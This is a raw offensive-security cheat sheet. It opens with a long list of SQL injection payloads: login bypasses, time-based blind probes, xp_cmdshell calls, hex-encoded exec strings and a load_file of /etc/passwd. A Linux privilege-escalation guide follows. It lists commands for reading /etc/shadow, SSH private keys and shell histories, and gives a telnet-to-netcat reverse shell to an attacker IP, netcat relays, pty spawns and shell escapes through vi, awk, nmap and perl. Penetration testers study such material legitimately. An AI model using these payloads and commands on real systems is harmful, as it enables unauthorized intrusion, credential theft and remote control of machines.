UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
WHERE 1=1 AND 1=0
WHERE 1=1 AND 1=0#
WHERE 1=1 AND 1=0--
WHERE 1=1 AND 1=1
WHERE 1=1 AND 1=1#
WHERE 1=1 AND 1=1--
\
\\
\x27UNION SELECT
`
`	    Backtick
``
a" or 1=1--
a"""" or 3=3--"""
a'
a' or 'a' = 'a
a' or 1=1--
a' or 3=3--
a' waitfor delay '0:0:10'--
admin' or '
and (select substring(@@version,1,1))='M'
and (select substring(@@version,1,1))='X'
and (select substring(@@version,2,1))='i'
and (select substring(@@version,2,1))='y'
and (select substring(@@version,3,1))='S'
and (select substring(@@version,3,1))='X'
and (select substring(@@version,3,1))='c'
and 0=benchmark(3000000,MD5(1))%20%23
and 0=benchmark(3000000,MD5(1))%20--
and 0=benchmark(3000000,MD5(1))%20/*
and 1 in (select var from temp)--
and 1=( if((load_file(char(110,46,101,120,11 ...
anything' OR 'x'='x
as
asc
benchmark(10000000,MD5(1))#
benchmark(50000000,MD5(1))
benchmark(50000000,MD5(1))#
benchmark(50000000,MD5(1))--
bfilename
char%4039%41%2b%40SELECT
declare @q nvarchar (200) 0x730065006c00650063 ...
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @q nvarchar (200) select @q = 0x770061 ...
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
declare @q nvarchar (4000) select @q =
declare @s varchar (200) select @s = 0x73656c6 ...
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
declare @s varchar (8000) select @s = 0x73656c ...
declare @s varchar(200) select @s = 0x77616974 ...
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
declare @s varchar(22) select @s =
delete
desc
distinct
exec sp
exec xp
exec(@s)
group by userid having 1=1--
handler
having
having 1=1--
hi or 1=1 --"
hi or a=a
hi"""") or (""""a""""=""""a"""
hi' or 'a'='a
hi' or 'x'='x';
hi' or 1=1 --
hi') or ('a'='a
insert
like
limit
or
or ""a""=""a"
or ''='
or '1'='1
or '1'='1'--
or '7659'='7659
or 'a'='a
or 'something' = 'some'+'thing'
or 'text' = n'text'
or 'text' > 't'
or 'unusual' = 'unusual'
or 'whatever' in ('whatever')
or (EXISTS)
or 0=0 #
or 0=0 #"
or 0=0 --
or 1 --'
or 1 in (select @@version)--
or 1/*
or 1=1
or 1=1 /*
or 1=1 or ""=
or 1=1 or ''='
or 1=1--
or 1=1--"
or 2 > 1
or 2 between 1 and 3
or 3=3
or SLEEP(5)
or SLEEP(5)#
or SLEEP(5)--
or SLEEP(5)="
or SLEEP(5)='
or a = a
or a=a
or a=a--
or benchmark(10000000,MD5(1))#
or benchmark(50000000,MD5(1))
or benchmark(50000000,MD5(1))#
or benchmark(50000000,MD5(1))--
or isNULL(1/0) /*
or pg_SLEEP(5)
or pg_SLEEP(5)#
or pg_SLEEP(5)--
or pg_sleep(__TIME__)--
or pg_sleep(__TIME__)--"
or sleep(__TIME__)#
or sleep(__TIME__)='
or username like char(37);
or%201=1
or%201=1 --
order by
password:*/=1--
pg_SLEEP(5)
pg_SLEEP(5)#
pg_SLEEP(5)--
pg_sleep(5)--
pg_sleep(__TIME__)--
procedure
replace
select
select * from information_schema.tables--
select name from syscolumns where id = (sele ...
sleep(5)#
sleep(__TIME__)#
sqlvuln
sqlvuln;
t'exec master..xp_cmdshell 'nslookup www.googl ...
t'exec master..xp_cmdshell 'nslookup www.google.com'--
to_timestamp_tz
truncate
tz_offset
uni/**/on sel/**/ect
union all select @@version--
union select
union select * from users where login = char ...
union select 1,load_file('/etc/passwd'),1,1,1;
update
waitfor delay '00:00:05'
waitfor delay '00:00:05'#
waitfor delay '00:00:05'--
waitfor delay '0:0:20' --
waitfor delay '0:0:20' /*
x' AND 1=(SELECT COUNT(*) FROM tabname); --
x' AND email IS NULL; --
x' AND members.email IS NULL; --
x' AND userid IS NULL; --
x' OR full_name LIKE '%Bob%
x' or 1=1 or 'x'='y
|
||		(double pipe) concatenate
||'6
||(elt(-3+5,bin(15),ord(10),hex(char(45))))
||6
||UTL_HTTP.REQUEST
ý or 1=1 --
‘ or 1=1 --
‘ or 3=3 --
)%20or%20('x'='x
%20or%201=1
(select(0)from(select(sleep(13)))v)/*'+(select(0)from(select(sleep(13)))v)+'\"+(select(0)from(select(sleep(13)))v)+\"*/
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),10)||'
' AND (SELECT 6377 FROM (SELECT(SLEEP(5)))hLTl)--
; execute immediate 'sel' || 'ect us' || 'er'
benchmark(10000000,MD5(1))#
1' OR NOT 2470=2470-- Ontu
' WAITFOR DELAY '0:0:5'--
';WAITFOR DELAY '0:0:5'-- 
')) or sleep(5)='
;waitfor delay '0:0:5'--
);waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
";waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
");waitfor delay '0:0:5'--
));waitfor delay '0:0:5'--
";waitfor delay '0:0:__TIME__'--
1) or pg_sleep(__TIME__)--
||(elt(-3+5,bin(15),ord(10),hex(char(45))))
"hi"") or (""a""=""a"
" or sleep(__TIME__)#
pg_sleep(__TIME__)--
*(|(objectclass=*))
declare @q nvarchar (200) 0x730065006c00650063 ...
 or 0=0 #
insert
1) or sleep(__TIME__)#
) or ('a'='a
; exec xp_regread
*|
@var select @var as var into temp end --
1)) or benchmark(10000000,MD5(1))#
asc
(||6)
"a"" or 3=3--"
" or benchmark(10000000,MD5(1))#
# from wapiti
 or 0=0 --
1 waitfor delay '0:0:10'--
 or 'a'='a
hi or 1=1 --"
or a = a
 UNION ALL SELECT
) or sleep(__TIME__)='
)) or benchmark(10000000,MD5(1))#
hi' or 'a'='a
0
21 %
limit
 or 1=1
 or 2 > 1
")) or benchmark(10000000,MD5(1))#
PRINT
hi') or ('a'='a
 or 3=3
));waitfor delay '0:0:__TIME__'--
a' waitfor delay '0:0:10'--
1;(load_file(char(47,101,116,99,47,112,97,115, ...
or%201=1
1 or sleep(__TIME__)#
or 1=1
 and 1 in (select var from temp)--
 or '7659'='7659
 or 'text' = n'text'
 --
 or 1=1 or ''='
declare @s varchar (200) select @s = 0x73656c6 ...
exec xp
; exec master..xp_cmdshell 'ping 172.10.1.255'--
3.10E+17
" or pg_sleep(__TIME__)--
x' AND email IS NULL; --
&
admin' or '
 or 'unusual' = 'unusual'
//
truncate
1) or benchmark(10000000,MD5(1))#
\x27UNION SELECT
declare @s varchar(200) select @s = 0x77616974 ...
tz_offset
sqlvuln
';%20waitfor%20delay%20'0:0:6'%20--%20
0"XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR"Z
0\"XOR(if(now()=sysdate(),sleep(9),0))XOR\"Z
if(now()=sysdate(),sleep(xx),0)
1 waitfor delay '0:0:5' --
0'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z
"));waitfor delay '0:0:__TIME__'--
||6
or%201=1 --
%2A%28%7C%28objectclass%3D%2A%29%29
or a=a
) union select * from information_schema.tables;
PRINT @@variable
or isNULL(1/0) /*
26 %
" or "a"="a
(sqlvuln)
x' AND members.email IS NULL; --
 or 1=1--
 and 1=( if((load_file(char(110,46,101,120,11 ...
0x770061006900740066006F0072002000640065006C00 ...
%20'sleep%2050'
as
1)) or pg_sleep(__TIME__)--
/**/or/**/1/**/=/**/1
 union all select @@version--
,@variable
(sqlattempt2)
 or (EXISTS)
t'exec master..xp_cmdshell 'nslookup www.googl ...
%20$(sleep%2050)
1 or benchmark(10000000,MD5(1))#
%20or%20''='
||UTL_HTTP.REQUEST
 or pg_sleep(__TIME__)--
hi' or 'x'='x';
") or sleep(__TIME__)="
 or 'whatever' in ('whatever')
; begin declare @var varchar(8000) set @var=' ...
 union select 1,load_file('/etc/passwd'),1,1,1;
0x77616974666F722064656C61792027303A303A313027 ...
exec(@s)
) or pg_sleep(__TIME__)--
 union select
 or sleep(__TIME__)#
 select * from information_schema.tables--
a' or 1=1--
a' or 'a' = 'a
declare @s varchar(22) select @s =
 or 2 between 1 and 3
 or a=a--
 or '1'='1
|
 or sleep(__TIME__)='
 or 1 --'
or 0=0 #"
having
a'
" or isNULL(1/0) /*
declare @s varchar (8000) select @s = 0x73656c ...
‘ or 1=1 --
char%4039%41%2b%40SELECT
order by
bfilename
 having 1=1--
) or benchmark(10000000,MD5(1))#
 or username like char(37);
;waitfor delay '0:0:__TIME__'--
" or 1=1--
x' AND userid IS NULL; --
*/*
 or 'text' > 't'
 (select top 1
 or benchmark(10000000,MD5(1))#
");waitfor delay '0:0:__TIME__'--
a' or 3=3--
 -- &password=
 group by userid having 1=1--
 or ''='
; exec master..xp_cmdshell
%20or%20x=x
select
")) or sleep(__TIME__)="
0x730065006c0065006300740020004000400076006500 ...
hi' or 1=1 --
") or pg_sleep(__TIME__)--
%20or%20'x'='x
 or 'something' = 'some'+'thing'
exec sp
29 %
(
ý or 1=1 --
1 or pg_sleep(__TIME__)--
0 or 1=1
) or (a=a
uni/**/on sel/**/ect
replace
%27%20or%201=1
)) or pg_sleep(__TIME__)--
%7C
x' AND 1=(SELECT COUNT(*) FROM tabname); --
&apos;%20OR
; or '1'='1'
declare @q nvarchar (200) select @q = 0x770061 ...
1 or 1=1
; exec ('sel' + 'ect us' + 'er')
23 OR 1=1
/
anything' OR 'x'='x
declare @q nvarchar (4000) select @q =
or 0=0 --
desc
||'6
)
1)) or sleep(__TIME__)#
or 0=0 #
 select name from syscolumns where id = (sele ...
hi or a=a
*(|(mail=*))
password:*/=1--
distinct
);waitfor delay '0:0:__TIME__'--
to_timestamp_tz
") or benchmark(10000000,MD5(1))#
 UNION SELECT
%2A%28%7C%28mail%3D%2A%29%29
+sqlvuln
 or 1=1 /*
)) or sleep(__TIME__)='
or 1=1 or ""=
 or 1 in (select @@version)--
sqlvuln;
 union select * from users where login = char ...
x' or 1=1 or 'x'='y
28 %
‘ or 3=3 --
@variable
 or '1'='1'--
"a"" or 1=1--"
//*
%2A%7C
" or 0=0 --
")) or pg_sleep(__TIME__)--
?
 or 1/*
!
'
 or a = a
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
' or 1=1
 or 1=1 --
x' OR full_name LIKE '%Bob%
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
'%20or%20''='
'%20or%20'x'='x
')%20or%20('x'='x
' or 0=0 --
' or 0=0 #
 or 0=0 #"
' or 1=1--
' or '1'='1'--
' or 1 --'
or 1=1--
' or 1=1 or ''='
 or 1=1 or ""=
' or a=a--
 or a=a
') or ('a'='a
'hi' or 'x'='x';
or
procedure
handler
' or username like '%
' or uname like '%
' or userid like '%
' or uid like '%
' or user like '%
'; exec master..xp_cmdshell
'; exec xp_regread
t'exec master..xp_cmdshell 'nslookup www.google.com'--
--sp_password
' UNION SELECT
' UNION ALL SELECT
' or (EXISTS)
' (select top 1
'||UTL_HTTP.REQUEST
1;SELECT%20*
<>"'%;)(&+
'%20or%201=1
'sqlattempt1
%28
%29
%26
%21
' or ''='
' or 3=3
 or 3=3 --
orwa' AND (SELECT 6377 FROM (SELECT(SLEEP(5)))hLTl)--
(SlEeP%09(14-(5-2)))
')) or sleep(5)=' 
' WAITFOR DELAY '0:0:5'-- 
;waitfor delay '0:0:5'-- 
);waitfor delay '0:0:5'-- 
';waitfor delay '0:0:5'-- 
";waitfor delay '0:0:5'-- 
');waitfor delay '0:0:5'-- 
");waitfor delay '0:0:5'-- 
));waitfor delay '0:0:5'-- 
0"XOR(if(now()=sysdate(),sleep(10),0))XOR"Z
0"XOR(if(now()=sysdate(),sleep(10),0))XOR"Z%20=%3E
0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
sleep(5)#
1 or sleep(5)#
" or sleep(5)#
' or sleep(5)#
" or sleep(5)="
' or sleep(5)='
1) or sleep(5)#
") or sleep(5)="
') or sleep(5)='
1)) or sleep(5)#
")) or sleep(5)="
'));waitfor delay '0:0:5'--
"));waitfor delay '0:0:5'--
' or benchmark(10000000,MD5(1))#
') or benchmark(10000000,MD5(1))#
')) or benchmark(10000000,MD5(1))#
pg_sleep(5)--
1 or pg_sleep(5)--
" or pg_sleep(5)--
' or pg_sleep(5)--
1) or pg_sleep(5)--
") or pg_sleep(5)--
') or pg_sleep(5)--
1)) or pg_sleep(5)--
")) or pg_sleep(5)--
')) or pg_sleep(5)--
AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#
SLEEP(5)#
SLEEP(5)--
SLEEP(5)="
SLEEP(5)='
or SLEEP(5)
or SLEEP(5)#
or SLEEP(5)--
or SLEEP(5)="
or SLEEP(5)='
waitfor delay '00:00:05'
waitfor delay '00:00:05'--
waitfor delay '00:00:05'#
benchmark(50000000,MD5(1))
benchmark(50000000,MD5(1))--
benchmark(50000000,MD5(1))#
or benchmark(50000000,MD5(1))
or benchmark(50000000,MD5(1))--
or benchmark(50000000,MD5(1))#
pg_SLEEP(5)
pg_SLEEP(5)--
pg_SLEEP(5)#
or pg_SLEEP(5)
or pg_SLEEP(5)--
or pg_SLEEP(5)#
'\"
AnD SLEEP(5)
AnD SLEEP(5)--
AnD SLEEP(5)#
&&SLEEP(5)
&&SLEEP(5)--
&&SLEEP(5)#
' AnD SLEEP(5) ANd '1
'&&SLEEP(5)&&'1
ORDER BY SLEEP(5)
ORDER BY SLEEP(5)--
ORDER BY SLEEP(5)#
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)#
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)--
+benchmark(3200,SHA1(1))+'
+ SLEEP(10) + '
RANDOMBLOB(500000000/2)
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
RANDOMBLOB(1000000000/2)
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/

LINUX PENTEST

Enumeration is the key. (Linux) privilege escalation is all about: Collect - Enumeration, more enumeration and some more enumeration. Process - Sort through data, analyse and prioritisation. Search - Know what to search for and where to find the exploit code. Adapt - Customize the exploit, so it fits. Not every exploit work for every system "out of the box". Try - Get ready for (lots of) trial and error.

Operating System What's the distribution type? What version? cat /etc/issue cat /etc/*-release cat /etc/lsb-release cat /etc/redhat-release

What's the Kernel version? Is it 64-bit? cat /proc/version uname -a uname -mrs rpm -q kernel dmesg | grep Linux ls /boot | grep vmlinuz-

What can be learnt from the environmental variables? cat /etc/profile cat /etc/bashrc cat ~/.bash_profile cat ~/.bashrc cat ~/.bash_logout env set

Is there a printer? lpstat -a

Applications & Services What services are running? Which service has which user privilege? ps aux ps -ef top cat /etc/service

Which service(s) are been running by root? Of these services, which are vulnerable - it's worth a double check! ps aux | grep root ps -ef | grep root

What applications are installed? What version are they? Are they currently running? ls -alh /usr/bin/ ls -alh /sbin/ dpkg -l rpm -qa ls -alh /var/cache/apt/archivesO ls -alh /var/cache/yum/

Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached? cat /etc/syslog.conf cat /etc/chttp.conf cat /etc/lighttpd.conf cat /etc/cups/cupsd.conf cat /etc/inetd.conf cat /etc/apache2/apache2.conf cat /etc/my.conf cat /etc/httpd/conf/httpd.conf cat /opt/lampp/etc/httpd.conf ls -aRl /etc/ | awk '$1 ~ /^.r./

What jobs are scheduled? crontab -l ls -alh /var/spool/cron ls -al /etc/ | grep cron ls -al /etc/cron* cat /etc/cron* cat /etc/at.allow cat /etc/at.deny cat /etc/cron.allow cat /etc/cron.deny cat /etc/crontab cat /etc/anacrontab cat /var/spool/cron/crontabs/root

Any plain text usernames and/or passwords? grep -i user [filename] grep -i pass [filename] grep -C 5 "password" [filename] find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla

Communications & Networking What NIC(s) does the system have? Is it connected to another network? /sbin/ifconfig -a cat /etc/network/interfaces cat /etc/sysconfig/network

What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway? cat /etc/resolv.conf cat /etc/sysconfig/network cat /etc/networks iptables -L hostname dnsdomainname

What other users & hosts are communicating with the system? lsof -i lsof -i :80 grep 80 /etc/services netstat -antup netstat -antpx netstat -tulpn chkconfig --list chkconfig --list | grep 3:on last w

Whats cached? IP and/or MAC addresses arp -e route /sbin/route -nee

Is packet sniffing possible? What can be seen? Listen to live traffic

tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]

tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.2.2.222 21

Have you got a shell? Can you interact with the system?

http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/

nc -lvp 4444 # Attacker. Input (Commands) nc -lvp 4445 # Attacker. Ouput (Results) telnet [atackers ip] 44444 | /bin/sh | [local ip] 44445 # On the targets system. Use the attackers IP!

Is port forwarding possible? Redirect and interact with traffic from another view

rinetd

http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch

fpipe

FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]

FPipe.exe -l 80 -r 80 -s 80 192.168.1.7

ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]

ssh -L 8080:127.0.0.1:80 root@192.168.1.7 # Local Port ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # Remote Port

mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe

mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe # Port Relay mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe # Proxy (Port 80 to 8080) mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe # Proxy monitor (Port 80 to 8080)

Is tunnelling possible? Send commands locally, remotely ssh -D 127.0.0.1:9050 -N [username]@[ip] proxychains ifconfig

Confidential Information & Users Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what? id who w last cat /etc/passwd | cut -d: # List of users grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users awk -F: '($3 == "0") {print}' /etc/passwd # List of super users cat /etc/sudoers sudo -l

What sensitive files can be found? cat /etc/passwd cat /etc/group cat /etc/shadow ls -alh /var/mail/

Anything "interesting" in the home directorie(s)? If it's possible to access ls -ahlR /root/ ls -ahlR /home/

Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords cat /var/apache2/config.inc cat /var/lib/mysql/mysql/user.MYD cat /root/anaconda-ks.cfg

What has the user being doing? Is there any password in plain text? What have they been edting? cat ~/.bash_history cat ~/.nano_history cat ~/.atftp_history cat ~/.mysql_history cat ~/.php_history

What user information can be found? cat ~/.bashrc cat ~/.profile cat /var/mail/root cat /var/spool/mail/root

Can private-key information be found? cat ~/.ssh/authorized_keys cat ~/.ssh/identity.pub cat ~/.ssh/identity cat ~/.ssh/id_rsa.pub cat ~/.ssh/id_rsa cat ~/.ssh/id_dsa.pub cat ~/.ssh/id_dsa cat /etc/ssh/ssh_config cat /etc/ssh/sshd_config cat /etc/ssh/ssh_host_dsa_key.pub cat /etc/ssh/ssh_host_dsa_key cat /etc/ssh/ssh_host_rsa_key.pub cat /etc/ssh/ssh_host_rsa_key cat /etc/ssh/ssh_host_key.pub cat /etc/ssh/ssh_host_key

File Systems Which configuration files can be written in /etc/? Able to reconfigure a service? ls -aRl /etc/ | awk '$1 ~ /^.w./' 2>/dev/null # Anyone ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null # Owner ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null # Group ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null # Other

find /etc/ -readable -type f 2>/dev/null # Anyone find /etc/ -readable -type f -maxdepth 1 2>/dev/null # Anyone

What can be found in /var/ ? ls -alh /var/log ls -alh /var/mail ls -alh /var/spool ls -alh /var/spool/lpd ls -alh /var/lib/pgsql ls -alh /var/lib/mysql cat /var/lib/dhcp3/dhclient.leases

Any settings/files (hidden) on website? Any settings file with database information? ls -alhR /var/www/ ls -alhR /srv/www/htdocs/ ls -alhR /usr/local/www/apache22/data/ ls -alhR /opt/lampp/htdocs/ ls -alhR /var/www/html/

Is there anything in the log file(s) (Could help with "Local File Includes"!)

http://www.thegeekstuff.com/2011/08/linux-var-log-files/

cat /etc/httpd/logs/access_log cat /etc/httpd/logs/access.log cat /etc/httpd/logs/error_log cat /etc/httpd/logs/error.log cat /var/log/apache2/access_log cat /var/log/apache2/access.log cat /var/log/apache2/error_log cat /var/log/apache2/error.log cat /var/log/apache/access_log cat /var/log/apache/access.log cat /var/log/auth.log cat /var/log/chttp.log cat /var/log/cups/error_log cat /var/log/dpkg.log cat /var/log/faillog cat /var/log/httpd/access_log cat /var/log/httpd/access.log cat /var/log/httpd/error_log cat /var/log/httpd/error.log cat /var/log/lastlog cat /var/log/lighttpd/access.log cat /var/log/lighttpd/error.log cat /var/log/lighttpd/lighttpd.access.log cat /var/log/lighttpd/lighttpd.error.log cat /var/log/messages cat /var/log/secure cat /var/log/syslog cat /var/log/wtmp cat /var/log/xferlog cat /var/log/yum.log cat /var/run/utmp cat /var/webmin/miniserv.log cat /var/www/logs/access_log cat /var/www/logs/access.log ls -alh /var/lib/dhcp3/ ls -alh /var/log/postgresql/ ls -alh /var/log/proftpd/ ls -alh /var/log/samba/

auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp

If commands are limited, you break out of the "jail" shell? python -c 'import pty;pty.spawn("/bin/bash")' echo os.system('/bin/bash') /bin/sh -i

How are file-systems mounted? mount df -h

Are there any unmounted file-systems? cat /etc/fstab

Kernel, Operating System & Device Information:

Command Result uname -a Print all available system information uname -r Kernel release uname -n System hostname hostname As above uname -m Linux kernel architecture (32 or 64 bit) cat /proc/version Kernel information cat /etc/*-release Distribution information cat /etc/issue As above cat /proc/cpuinfo CPU information df -a File system information

Users & Groups:

Command Result cat /etc/passwd List all users on the system cat /etc/group List all groups on the system for i in $(cat /etc/passwd 2>/dev/null| cut -d":" -f1 2>/dev/null);do id $i;done 2>/dev/null List all uid’s and respective group memberships cat /etc/shadow Show user hashes – Privileged command grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' List all super user accounts finger Users currently logged in pinky As above users As above who -a As above w Who is currently logged in and what they’re doing last Listing of last logged on users lastlog Information on when all users last logged in lastlog –u %username% Information on when the specified user last logged in lastlog |grep -v "Never" Entire list of previously logged on users

User & Privilege Information:

Command Result whoami Current username id Current user information cat /etc/sudoers Who’s allowed to do what as root – Privileged command sudo -l Can the current user perform anything as root sudo -l 2>/dev/null | grep -w 'nmap|perl|'awk'|'find'|'bash'|'sh'|'man'

|'more'|'less'|'vi'|'vim'|'nc'|'netcat'|python

|ruby|lua|irb' | xargs -r ls -la 2>/dev/null Can the current user run any ‘interesting’ binaries as root and if so also display the binary permissions etc.

Environmental Information:

Command Result env Display environmental variables set As above echo $PATH Path information history Displays command history of current user pwd Print working directory, i.e. ‘where am I’ cat /etc/profile Display default system variables cat /etc/shells Display available shells

Interesting Files:

Command Result find / -perm -4000 -type f 2>/dev/null Find SUID files find / -uid 0 -perm -4000 -type f 2>/dev/null Find SUID files owned by root find / -perm -2000 -type f 2>/dev/null Find GUID files find / -perm -2 -type f 2>/dev/null Find world-writeable files find / ! -path "/proc/" -perm -2 -type f -print 2>/dev/null Find world-writeable files excluding those in /proc find / -perm -2 -type d 2>/dev/null Find word-writeable directories find /home –name .rhosts -print 2>/dev/null Find rhost config files find /home -iname .plan -exec ls -la {} ; -exec cat {} 2>/dev/null ; Find .plan files, list permissions and cat the file contents find /etc -iname hosts.equiv -exec ls -la {} 2>/dev/null ; -exec cat {} 2>/dev/null ; Find hosts.equiv, list permissions and cat the file contents ls -ahlR /root/ See if you can access other user directories to find interesting files cat ~/.bash_history Show the current users’ command history ls -la ~/._history Show the current users’ various history files ls -la /root/._history Can we read root’s history files ls -la ~/.ssh/ Check for interesting ssh files in the current users’ directory find / -name "id_dsa" -o -name "id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" 2>/dev/null |xargs -r ls -la Find SSH keys/host information ls -la /usr/sbin/in.* Check Configuration of inetd services grep -l -i pass /var/log/*.log 2>/dev/null Check log files for keywords (‘pass’ in this example) and show positive matches find /var/log -type f -exec ls -la {} ; 2>/dev/null List files in specified directory (/var/log) find /var/log -name *.log -type f -exec ls -la {} ; 2>/dev/null List .log files in specified directory (/var/log) find /etc/ -maxdepth 1 -name .conf -type f -exec ls -la {} ; 2>/dev/null List .conf files in /etc (recursive 1 level) ls -la /etc/.conf As above find / -maxdepth 4 -name *.conf -type f -exec grep -Hn password {} ; 2>/dev/null Find .conf files (recursive 4 levels) and output line number where the word ‘password’ is located lsof -i -n List open files (output will depend on account privileges) head /var/mail/root Can we read roots mail

Service Information:

Command Result ps aux | grep root View services running as root ps aux | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++' Lookup process binary path and permissions cat /etc/inetd.conf List services managed by inetd cat /etc/xinetd.conf As above for xinetd cat /etc/xinetd.conf 2>/dev/null | awk '{print $7}' |xargs -r ls -la 2>/dev/null A very ‘rough’ command to extract associated binaries from xinetd.conf and show permissions of each ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null Permissions and contents of /etc/exports (NFS)

Jobs/Tasks:

Command Result crontab -l -u %username% Display scheduled jobs for the specified user – Privileged command ls -la /etc/cron* Scheduled jobs overview (hourly, daily, monthly etc) ls -aRl /etc/cron* | awk '$1 ~ /w.$/' 2>/dev/null What can ‘others’ write in /etc/cron* directories top List of current tasks

Networking, Routing & Communications:

Command Result /sbin/ifconfig -a List all network interfaces cat /etc/network/interfaces As above arp -a Display ARP communications route Display route information cat /etc/resolv.conf Show configured DNS sever addresses netstat -antp List all TCP sockets and related PIDs (-p Privileged command) netstat -anup List all UDP sockets and related PIDs (-p Privileged command) iptables -L List rules – Privileged command cat /etc/services View port numbers/services mappings

Programs Installed:

Command Result dpkg -l Installed packages (Debian) rpm -qa Installed packages (Red Hat) sudo -V Sudo version – does an exploit exist? httpd -v Apache version apache2 -v As above apache2ctl (or apachectl) -M List loaded Apache modules mysql --version Installed MYSQL version details psql -V Installed Postgres version details perl -v Installed Perl version details java -version Installed Java version details python --version Installed Python version details ruby -v Installed Ruby version details find / -name %program_name% 2>/dev/null (i.e. nc, netcat, wget, nmap etc) Locate ‘useful’ programs (netcat, wget etc) which %program_name% (i.e. nc, netcat, wget, nmap etc) As above dpkg --list 2>/dev/null| grep compiler |grep -v decompiler 2>/dev/null && yum list installed 'gcc*' 2>/dev/null| grep gcc 2>/dev/null List available compilers cat /etc/apache2/envvars 2>/dev/null |grep -i 'user|group' |awk '{sub(/.*export /,"")}1' Which account is Apache running as

Common Shell Escape Sequences:

Command Program(s) :!bash vi, vim :set shell=/bin/bash:shell vi, vim !bash man, more, less find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' ; find awk 'BEGIN {system("/bin/bash")}' awk --interactive nmap echo "os.execute('/bin/sh')" > exploit.nse

sudo nmap --script=exploit.nse nmap (thanks to comment by anonymous below) perl -e 'exec "/bin/bash";' Perl

What "Advanced Linux File Permissions" are used? Sticky bits, SUID & GUID find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it. find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it.

find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID for i in locate -r "bin$"; do find $i ( -perm -4000 -o -perm -2000 ) -type f 2>/dev/null; done # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)

find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)

find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} ; 2>/dev/null

